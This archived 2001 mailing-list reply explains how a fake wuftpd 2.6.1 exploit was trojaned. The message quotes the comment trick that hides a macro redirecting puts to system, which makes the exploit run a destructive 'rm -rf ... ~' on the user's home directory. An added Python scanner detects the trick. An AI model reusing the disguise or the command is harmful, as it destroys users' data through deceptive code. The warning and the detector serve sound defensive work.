Vulnerability Development mailing list archives

Re[2]: wuftpd 2.6.1 advisory/exploit


From: Alexander Ryumshin <mizi () alkar net>
Date: Thu, 20 Sep 2001 15:55:14 +0300

Hello,

Yes, the trick is here:

//#define POTS 12                       /* fill these in for your
#define DEF_ALGN 1                       * target system  
//#define HEAP_ADDR 0x41414141           */ 
...
#define target (unsigned long)
...
unsigned long arg_addr = ADDR, align = DEF_ALGN,

After preprocessing the code looks like

unsigned long arg_addr = 0x08049588, align = 1 * (unsigned long) system;

Then puts' address is being replaced by system's or something like
that and then puts("rm -rf is not elite ~"); does the main trick :)
Hint: ~ means your home directory.


Wednesday, September 19, 2001, 6:38:14 PM, you wrote:

BB> Hey, I'm told that this exploit like eats your hard drive or something.
BB> Caveat emptor and all, but I figured since I actually heard about this,
BB> I'd let you know.  I guess it's a spoofed note.

BB>                                         BB


--
Best regards,
Alexander
ISP Alkar Teleport
tel/fax +380 562 340044
mailto:mizi () alkar net
http://abn.com.ua
http://ufa.com.ua
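
Added example, not part of the original message or of the code it quotes: a small Python scanner for the comment trick described above, where a "/*" that sits inside a "//" comment makes the following lines look commented out while the compiler still sees them. The function names and both sample inputs (the first rebuilt from the excerpt quoted in the message) are constructed for illustration.

```python
def _scan(line, in_block):
    """Lex one C line; return (has_live_code, line_comment_text, in_block)."""
    i, live, n = 0, False, len(line)
    while i < n:
        two = line[i:i + 2]
        if in_block:                      # inside a real /* ... */ comment
            if two == "*/":
                in_block, i = False, i + 2
            else:
                i += 1
        elif two == "//":                 # rest of the line is a comment
            return live, line[i + 2:], in_block
        elif two == "/*":
            in_block, i = True, i + 2
        elif line[i] in "\"'":            # skip string and char literals
            quote, i, live = line[i], i + 1, True
            while i < n and line[i] != quote:
                i += 2 if line[i] == "\\" else 1
            i += 1
        else:
            live = live or not line[i].isspace()
            i += 1
    return live, None, in_block

def find_disguised_code(source):
    """Return (line_no, text) for live lines lying between a '/*' that is
    itself inside a '//' comment and the next '*/' (a fake block comment)."""
    findings, pending = [], []
    in_block = fake_open = False
    for no, line in enumerate(source.splitlines(), 1):
        live, comment, in_block = _scan(line, in_block)
        if fake_open:
            if live:                      # compiled, though it looks commented
                pending.append((no, line.strip()))
            if "*/" in line:              # visual end of the fake comment
                findings += pending
                pending, fake_open = [], False
        elif comment is not None and "/*" in comment:
            fake_open = "*/" not in comment.split("/*", 1)[1]
    return findings

# Constructed samples: the quoted excerpt, and a genuine block comment.
TROJANED = """\
//#define POTS 12                       /* fill these in for your
#define DEF_ALGN 1                       * target system
//#define HEAP_ADDR 0x41414141           */
"""
BENIGN = "/* fill these in for your\n * target system\n */\n#define DEF_ALGN 1\n"

if __name__ == "__main__":
    print(find_disguised_code(TROJANED), find_disguised_code(BENIGN))
```

A hit on a "#define" line is the case from this thread; running the file through the preprocessor alone (cc -E) and reading the expanded initializers confirms what the macro really becomes.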

